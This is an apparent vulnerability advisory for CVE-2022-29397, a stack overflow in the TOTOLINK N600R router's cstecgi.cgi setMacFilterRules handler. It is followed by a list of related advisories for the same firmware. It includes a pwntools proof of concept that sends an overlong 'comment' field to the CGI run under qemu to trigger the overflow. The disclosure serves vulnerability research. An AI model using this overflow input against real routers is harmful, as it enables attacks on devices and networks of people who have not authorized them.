Headline
CVE-2022-29397: IoT-vuln/Totolink/4.setMacFilterRules at main · d1tto/IoT-vuln
TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_004196c8.
The vulnerability exists in the router’s WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_004196c8 (at address 0x04196c8) gets the JSON parameter comment, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:
from pwn import * import json
data = { "topicurl": "setting/setMacFilterRules", "addEffect": "0", "macAddress": "A:A:A:A", "comment": "A"*0x200, } data = json.dumps(data) print(data)
argv = [ "qemu-mips-static", "-g", "1234", "-L", "./lib", "-E", "LD_PRELOAD=./hook.so", "-E", "CONTENT_LENGTH={}".format(len(data)), "-E", "REMOTE_ADDR=192.168.2.1", “./cstecgi.cgi” ]
a = process(argv=argv)
a.sendline(data.encode())
a.interactive()
Related news
TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_004192cc.
TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_00418f10.
TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_00418c24.
TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the url parameter in the function FUN_00415bf0.
TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_004200c8.
TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_004196c8.